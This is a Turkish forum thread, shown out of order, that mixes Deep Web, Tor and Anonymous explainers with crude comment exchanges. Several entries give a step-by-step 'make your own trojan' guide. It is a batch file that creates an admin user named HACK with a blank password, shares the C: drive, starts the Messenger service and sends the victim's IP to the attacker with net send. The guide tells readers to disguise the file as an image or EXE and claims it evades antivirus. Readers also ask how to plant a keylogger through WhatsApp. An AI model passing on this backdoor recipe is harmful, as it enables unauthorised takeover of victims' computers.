1. 26.
    +3
    Scientology Kilisesi'nin çağrı hatlarını kitlediler ve sürekli olarak siyah fax göndererek yazıcı tonerinin bitmesine neden oldular. Daha sonrasında sitelerine erişimi kestiler. Site çökük bir vaziyetteyken Anonymous ilişkili birçok isim YouTube'da robot sesi kullanarak bir mesaj yayınladı. Mesajda "takipçilerinizin ve internetin iyiliği için, sizi internetten sileceğiz" deniyordu. Scientology Kilisesi'nin önemli isimlerinden Tom Cruise da Anonymous'tan nasibini alan isimler arasındadır.
    ···
  2. 27.
    +3
    Deep Web'in başlıca örneği: Wikileaks!

    Bilindiği gibi devletlere ait gizli belgeleri sızdıran Wikileaks, ilk etapta biraz önce tanımladığımız Brightnet kapsamında yer alıyordu. Yani Darknet’in içerikleri gibi insanlık dışı değil ancak doğrudan Deep Web içeriği olarak tanımlanamayacak kadarda özel içerikler sunuyordu.

    Daha sonraları Wikileaks, Deep Web içerisinde gizliliğini yitirmeye başladı ve herkese açık olarak indekslenebilir yani bulunabilir hale getirildi.

    Deep Web’in bu şekilde sahip olduğu çok seviyeli/katmanlı yapısı, daha önce belirttiğimiz veri büyüklüğü bilinmezliğinin de başlıca sebeplerinden oluyor...
    ···
  3. 28.
    +3
    Deep Web sitelerine Nasıl ulaşılır?

    Önceki bölümde uzun uzadıya açıklandığı gibi Deep Web, sahip olduğu bu derinlik iddialarını aslında bilinmezliğinden alıyor. Ne kadar derin veya ne tarz sitelere veya kişilere ulaşılma verilerinin analizleri de, yine erişim zorlukları nedeniyle net olarak gerçekleştirilemiyor.
    ···
    1. 1.
      0
      Kardesim peki bilgisayarda keylogger oldugunu nasil anlariz internette bir sey buldum cmd ye netstat -an | find ":25" yazinca bir sey cikmamasi gerekiyormuş fakat bende 3 tane UDP bir seyler yaziyor sence ne yapmaliyim acil yanitlarsan iyi olur
      ···
  4. 29.
    +3
    heyçkır mısın sen
    ···
    1. 1.
      0
      Değilim olmaya çalışıyoz gülüm
      ···
    2. 2.
      -1
      huur cocu sen oybirinciydin ne ara önüncü oldun aq
      ···
      1. 1.
        0
        senin gibi aptal huur çocuklarını kandırıyodum hahaha
        ···
    3. 3.
      0
      Heyçkır benim o bebe
      ···
    4. diğerleri 1
  5. 30.
    +3
    Dolayısıyladır ki, özellikle merak için Tor Ağı’nı kullanan ve Darknet sitelerine erişmek isteye kimseler, sahte veya ortalama siteler ile karşılaşmaları muhtemel kimselerden olabilirler. Bununla beraber Tor Ağı kullanıyor olmaları da, IP adreslerinin bir yerlerde iz bırakmasıyla da sonuçlanıyor olacaktır.
    ···
  6. 31.
    +2
    Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

    Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.
    ···
  7. 32.
    +2
    Trojan Nasil Yapilir?
    Evet arkadaslar, konunun basligindan da anlayabileceginiz gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan yapmayi size kisaca anlatacagim;

    Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir harekettir
    ···
  8. 33.
    +2
    Usta sözlük yararlı bilgilerle dolmaya başladı bu ne amk
    ···
    1. 1.
      0
      Bide sizin gii güzel insanlardan destek gelince 10 numara 5 yıldız oluyo
      ···
  9. 34.
    +2
    DarkNet Siteleri ne kadar gerçek?

    Çoğunlukla savsata olarak değerlendirilen bu suç gerektiren kategorilerde yer alan Darknet siteleri, kurucuları tarafından büyük bir hassasiyetle gizli tutulmaya çalışılıyor. Daha önce de belirtildiği gibi, herhangi bir arama motoru ile Deep Web sitelerine ulaşmak mümkün değildir.

    Aslı olan Darknet siteleri de genel olarak IP tabanlı erişime imkan sunarlar ve bu adreslerin bilgileri sadece el altından, ciddi alıcı olduğuna inanılan kişilere ulaştırılır. Yani gerçek anlamda, silah satışı, kiralık katil ilanı veya sahte pasaport temini sağlayan sitelere ulaşmak, ciddi anlamda güçtür.
    ···
  10. 35.
    +2
    4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

    net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

    Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.
    ···
  11. 36.
    +2
    Anonoymous saldırıları

    Ana akım medyada ilk çıkışlarını, bir otel sitesine aynı profil fotoğrafı ve kimlikle kayıt olmaları ve siteyi kullanılmaz hale getirmeleriyle yaptılar. Bu saldırıları sonucunda "steroid basmış hackerlar", "evcil teröristler" gibi isimler kazandılar. Daha sonrasında bu tip saldırıları internet genelinde yapmaya devam ettiler.

    2004 yılından beri yaptıkları site çökertme işine günümüzde de devam ediyorlar.
    ···
  12. 37.
    +3 -1
    Öte yandan yine yanlış anlaşılmaların kurbanı olarak Deep Web ismi, doğrudan bu Darknet içerikleri ile bağdaştırılıyor. Ama bu algıda ne yazık ki yanlış… Zira Deep Web, tanımından da anlaşılacağı üzere, aslında sadece indekslenemeyen yani arama motorlarına görünmeyen siteleri veya verileri tanımlıyor. Ancak herhangi bir kuruma ait özel çevrimiçi belgeler dahi, aslında Deep Web içeriği olarak değerlendirebilir. Bu bağlamda, iki tabir arasındaki ayrımı doğru yapmak gerekiyor.

    Son olarak birde Darknet’in aydınlık kısmı olarak anılan Brightnet tabirine açıklık getirelim. Brightnet olarak tabir gören siteler veya içerikler, Darknet içerikleri olmadığı gibi doğrudan Deep Web içerisinde de yer almıyor. Yani Darkweb gibi insanlık dışı veya ağır suç gerektiren içerikleri barındırmıyor. Buna nazaran yayınları, aslında çokta "neşeli" değil. Örnek vermek gerekirse hepimizin bildiği ve şu an herkesin erişebildiği Wikileaks isimli web sitesi, aslında Deep Web’de doğmuş bir sitedir.
    ···
  13. 38.
    +2
    4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

    Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

    net start Messenger

    Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardigib sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.

    Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

    Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.
    ···
  14. 39.
    +3 -1
    Trojen atmayla hacker oldu amk evladı
    ···
  15. 40.
    +2
    Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

    Simdi Trojanimizi hazirlamaya baslayalim;

    1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

    net user HACK /add

    Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;
    ···
  16. 41.
    +1
    Moruk karşı tarafa resimde gömülü şekilde whatsapptan keylogger trojan atabilir miyiz? Atsak sms çağrı kaydı veya whatsapp konuşmalarını görebilir miyiz?
    ···
  17. 42.
    +1
    NSA, Tor Ağı'nı Kontrol Ediyor!

    Tor Ağı’nın bu tarz gizli dolaşım vaat etmesi, Deep Web altındaki Darknet siteleri için kullanılırken, ayrıca illegal işler ile uğraşan kimselerin de, uğrak alanlarından oluyor. Tor Ağı’nın bu denli suç gerektiren işler için araç olarak kullanılmasının artış göstermesi, NSA tarafından da, üzerinde yoğunlaşılması gereken bir alan olarak değerlendirilmiştir.
    ···
  18. 43.
    +1
    Aslında Tor Ağı, temel olarak bir VPN servisi ile benzerlik gösteriyor. Tor Browser ile erişilen Tor Ağı, kullanıcıyı Dünya üzerindeki birçok noktadaki farklı bilgisayarlar üzerinden geçiren bir bağlantı sağlıyor. Yani VPN servisinde olduğu gibi Dünya’nın belli bir noktasındaki sunucudan değil de, birçok farklı bölgedeki birçok farklı bilgisayarlar üzerinden erişim sağlıyor.
    ···
  19. 44.
    +1
    Rez ogret panpa lazim
    ···
    1. 1.
      0
      Entryleri şukularsanız daha fazla arkadaşa yardımcı olurum teşekkürler
      ···
  20. 45.
    +1
    Tor Ağı ile Deep Web ilişkisine geri dönecek olursak, görülebileceği üzere Deep Web veya farklı bağlantıları suç gerektiren eylemler ile kullanmak, büyük sonuçlar ortaya çıkartabiliyor. Tor Browser kullanarak, Tor Ağı üzerinden Deep Web veya Darknet sitelerine ulaşmanın mümkün olduğunu belirtmiştik. Ancak sadece Tor Browser ile ilk bölümde bahsi geçen sitelere ulaşmak mümkün değildir. Öyle ki, özellikle Darknet kapsamında bulunan siteler, bildiğimiz internet siteleri gibi “.com” veya “.net” gibi uzantılara sahip değiller...
    ···